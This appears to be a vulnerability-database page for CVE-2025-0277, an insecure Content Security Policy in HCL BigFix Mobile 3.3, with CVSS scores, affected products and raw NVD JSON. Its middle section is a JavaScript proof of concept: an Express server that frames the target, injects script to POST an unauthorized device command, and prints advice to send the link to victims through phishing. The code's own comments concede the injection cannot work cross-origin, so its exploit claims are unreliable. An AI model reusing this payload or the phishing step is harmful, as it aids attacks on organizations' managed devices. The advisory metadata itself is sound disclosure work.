Security Vulnerability Report
CVE-2025-0277 CVSS 6.5 MEDIUM

CVE-2025-0277

Published: 2025-10-16 09:15:33
Last Modified: 2025-10-21 18:15:34

Description

HCL BigFix Mobile 3.3 and earlier are vulnerable to certain insecure directives within the Content Security Policy (CSP). An attacker could trick users into performing actions by not properly restricting the sources of scripts and other content.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_mobile:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:bigfix_modern_client_management:*:*:*:*:*:*:*:* - VULNERABLE
HCL BigFix Mobile <= 3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-0277 PoC - HCL BigFix Mobile CSP Unsafe Directives Exploitation
// This PoC demonstrates how an attacker can exploit insecure CSP directives
// in HCL BigFix Mobile 3.3 and earlier versions.
// (Note: this is Node.js/Express code, not Python as the original label said.)

// Step 1: Host a malicious HTML page that exploits the CSP weakness
// The vulnerable application uses unsafe CSP directives such as 'unsafe-inline'
// or wildcard sources, allowing inline scripts to execute.
const express = require('express');
const app = express();

app.get('/exploit', (req, res) => {
  // Set a Content-Type that might be accepted by the vulnerable app
  res.set('Content-Type', 'text/html');
  res.send(`
<!DOCTYPE html>
<html>
<head>
  <title>Malicious Page</title>
  <!-- Exploit: Due to insecure CSP in BigFix Mobile, inline scripts are allowed to execute -->
</head>
<body>
  <h1>Loading BigFix Mobile content...</h1>
  <iframe src="https://target-bigfix-mobile-server" width="100%" height="600px" style="border:none;"></iframe>
  <script>
    // Step 2: Exploit unsafe-inline or unsafe-eval CSP directive
    // This inline script can execute because CSP is misconfigured
    // Attempt to perform actions on behalf of the user
    const iframe = document.querySelector('iframe');
    iframe.onload = function() {
      try {
        // Access the BigFix Mobile application context
        // Caveat: contentDocument is null for a cross-origin frame (same-origin policy),
        // so the branch below never runs against a remote target; the page only shows
        // that inline script executes under a permissive CSP.
        const doc = iframe.contentDocument;
        // Exploit: Execute arbitrary actions within the app
        // due to insufficient CSP source restrictions
        if (doc) {
          // Inject malicious script into the app context
          // (inner backticks are escaped because this sits inside the outer template literal)
          const script = doc.createElement('script');
          script.textContent = \`
            // Simulate unauthorized action execution
            fetch('/api/mobile/devices/action', {
              method: 'POST',
              headers: {'Content-Type': 'application/json'},
              body: JSON.stringify({ action: 'unauthorized_command', target: 'managed_device' })
            });
          \`;
          doc.head.appendChild(script);
          console.log('[+] CSP bypass successful - action executed');
        }
      } catch (e) {
        console.log('[-] Exploit failed: ' + e.message);
      }
    };
  </script>
</body>
</html>
`);
});

// Step 3: Serve the exploit
app.listen(8080, () => {
  console.log('CVE-2025-0277 PoC server running on http://localhost:8080/exploit');
  console.log('Send this URL to the victim via phishing or social engineering');
});

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124513 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-0277", "sourceIdentifier": "[email protected]", "published": "2025-10-16T09:15:32.983", "lastModified": "2025-10-21T18:15:34.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Mobile 3.3 and earlier are vulnerable to certain insecure directives within the Content Security Policy (CSP). An attacker could trick users into performing actions by not properly restricting the sources of scripts and other content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-80"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_mobile:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.3", "matchCriteriaId": "97CEC651-375F-4FE8-B947-0A3D89FF0267"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_modern_client_management:*:*:*:*:*:*:*:*", 
"versionEndExcluding": "3.4", "matchCriteriaId": "251EA75C-E4D9-4A13-B13D-02DFF9E6161D"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124513", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}